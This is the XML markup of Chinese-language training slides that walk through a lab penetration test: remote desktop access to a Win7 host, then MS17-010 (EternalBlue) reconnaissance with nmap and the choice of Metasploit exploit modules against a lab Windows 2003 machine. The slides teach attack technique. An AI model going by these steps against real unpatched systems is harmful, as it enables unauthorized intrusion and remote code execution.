        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2743200"/>
            <a:ext cx="4705350" cy="3037205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="5867400"/>
            <a:ext cx="3284220" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-44 远程连接10.10.10.132</a:t>
            </a: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知识储备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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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成功进行远程连接，如图5-45所示。</a:t>
            </a:r>
            <a:endParaRPr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962400" y="5943600"/>
            <a:ext cx="3284220" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-45 成功进行远程连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="图片 45" descr="image (12)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2707005"/>
            <a:ext cx="3426460" cy="3173730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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（4）或打开笔记本，开始菜单-》附件-》远程桌面连接，如图5-46所示。</a:t>
            </a:r>
            <a:endParaRPr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962400" y="6096000"/>
            <a:ext cx="3284220" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-46 打开远程桌面连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="图片 46" descr="image (13)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2667000"/>
            <a:ext cx="2069465" cy="3302635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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MS08_067漏洞利用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2.MS08_067漏洞利用项目实施分析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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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看到下面的界面，如图5-47所示，已经通过test的账号进入到WIN 7的桌面系统了！</a:t>
            </a:r>
            <a:endParaRPr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191000" y="6324600"/>
            <a:ext cx="3623310" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-47 通过test用户登陆win7桌面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="图片 47" descr="image (14)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="2841625"/>
            <a:ext cx="4474210" cy="3408680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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1.</a:t>
            </a:r>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分析MS17_010漏洞利用</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66800" y="1752600"/>
            <a:ext cx="10718165" cy="3784600"/>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永恒之蓝漏洞的利用基于Windows操作系统中的一个漏洞(CVE-2017-0144)，主要涉及以下几个方面的技术细节:</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1.Windows SMB服务漏洞:漏洞利用了Windows操作系统中的Server Message Block(SMB) v1协议的一个安全漏洞。SMB协议是Windows系统用于文件和打印机共享的网络协议。</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2.远程执行代码(RCE):漏洞允许攻击者通过发送特制的网络数据包，无需用户交互即可远程执行恶意代码。这使得攻击者可以获取目标系统的控制权。</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3.无需身份验证:攻击者可以在不需要凭据或者认证的情况下利用漏洞，这使得漏洞的利用更为危险和普遍。</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676400"/>
            <a:ext cx="10718165" cy="55308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首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况，如图5-48所示。</a:t>
            </a:r>
            <a:endParaRPr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821430" y="5105400"/>
            <a:ext cx="3646170" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-49 显示目标主机开放的端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="图片 48"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2286000"/>
            <a:ext cx="5568950" cy="627380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2971800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-48 使用nmap扫描网段主机的存活情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276350" y="3352800"/>
            <a:ext cx="9274175" cy="1014730"/>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此时已经扫描出来了，ip为：192.168.56.132的主机开启，并且显示了开放的端口号，如图5-49所示。然后我们可以使用：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="图片 49"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="4495800"/>
            <a:ext cx="3274060" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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74495"/>
            <a:ext cx="10718165" cy="55308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去扫描该主机端口从1-1000的开放情况。可以看到开放了如下端口，如图5-50所示。</a:t>
            </a:r>
            <a:endParaRPr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886200" y="3962400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-50 目标主机1-1000端口开放情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4330700"/>
            <a:ext cx="8427085" cy="55308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接着我们使用命令去扫描该主机的操作系统类型，如图5-51所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="图片 50"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="2374900"/>
            <a:ext cx="3689350" cy="1421130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="图片 51"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5029200"/>
            <a:ext cx="2260600" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="5523865"/>
            <a:ext cx="3838575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-51 扫描目标主机操作系统类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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74495"/>
            <a:ext cx="10718165" cy="55308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查询出来操作系统为：win2003，如图5-52所示。</a:t>
            </a:r>
            <a:endParaRPr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505200" y="5562600"/>
            <a:ext cx="3838575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-52 目标主机操作系统为win2003</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="图片 52" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2362200"/>
            <a:ext cx="5800090" cy="3070225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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74495"/>
            <a:ext cx="10718165" cy="1014730"/>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查询出来操作系统为：win2003。</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分析了相关信息后，就可以使用nmap自带的脚本去扫描该主机上的漏洞了，如图5-53所示。</a:t>
            </a:r>
            <a:endParaRPr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895600" y="3352800"/>
            <a:ext cx="4915535" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-53 nmap自带脚本扫描目标主机漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="图片 53"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="2743200"/>
            <a:ext cx="3461385" cy="457835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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69645" y="1674495"/>
            <a:ext cx="10967720" cy="1014730"/>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这里扫描出来了两个漏洞，ms17-010就是永恒之蓝漏洞，我们已经使用nmap扫描出来了漏洞，如图5-54所示，接着我们需要使用工具利用漏洞。这里我们选择 Metasploit Framework(MSF)。</a:t>
            </a:r>
            <a:endParaRPr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733800" y="6400800"/>
            <a:ext cx="4492625" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-54 扫描到目标主机漏洞MS17-010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="图片 54" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2743200"/>
            <a:ext cx="6372225" cy="3562985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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22680" y="1674495"/>
            <a:ext cx="10147300" cy="239966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Metasploit（MSF）是一个免费的、可下载的框架，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞，是一款专业级漏洞攻击工具。因为只要掌握MSF的使用方法，每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。</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在kali上，使用 msfconsole，进入这个工具。我们在上面已经知道了永恒之蓝编号：(ms17-010)，所以我们在msf中可以使用search命令去搜索相关漏洞，如图5-55所示。</a:t>
            </a:r>
            <a:endParaRPr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4114800" y="4876800"/>
            <a:ext cx="3838575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-55 使用search命令搜索漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="图片 55"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4114800"/>
            <a:ext cx="3266440" cy="636270"/>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4302" cy="843748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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Metasploit框架介绍</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547" y="1994199"/>
            <a:ext cx="6414302" cy="1261086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。</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56837" y="3761555"/>
            <a:ext cx="6214706" cy="843748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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框架设计初衷</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56837" y="4425262"/>
            <a:ext cx="6486882" cy="1261086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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Metasploit旨在成为攻击工具开发平台，但实际上，安全专家和业余爱好者更倾向于将其视为一个点几下鼠标就能进行成功攻击的环境。</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l="42529" r="42529"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432632" y="1237527"/>
            <a:ext cx="3505033"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渗透测试神器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74495"/>
            <a:ext cx="10718165" cy="55308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使用search命令搜索漏洞结果，如图5-56所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="图片 56" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2241550"/>
            <a:ext cx="9374505" cy="1381125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3733800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-56 使用search命令搜索漏洞结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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88085" y="1676400"/>
            <a:ext cx="10718165" cy="332295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扫描模块位置：</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 auxiliary/scanner/smb/smb_ms17_010    </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 攻击代码位置：</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 exploit/windows/smb/ms17_010_eternalblue</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 exploit/windows/smb/ms17_010_eternalblue_win8  </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 exploit/windows/smb/ms17_010_psexec            </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 exploit/windows/smb/smb_doublepulsar_rce </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74495"/>
            <a:ext cx="10718165" cy="55308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使用use命令，去选择相关模块，use 1：选择一号模块，可以远程执行代码。如图5-57所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="图片 57" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2470150"/>
            <a:ext cx="6224270" cy="2283460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="4876800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-57 使用use命令选择模块1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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74495"/>
            <a:ext cx="10718165" cy="55308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然后我们使用命令：show options，显示配置项，如图5-58所示。</a:t>
            </a:r>
            <a:endParaRPr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429000" y="5410200"/>
            <a:ext cx="4749800" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-58 使用show options命令显示配置项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
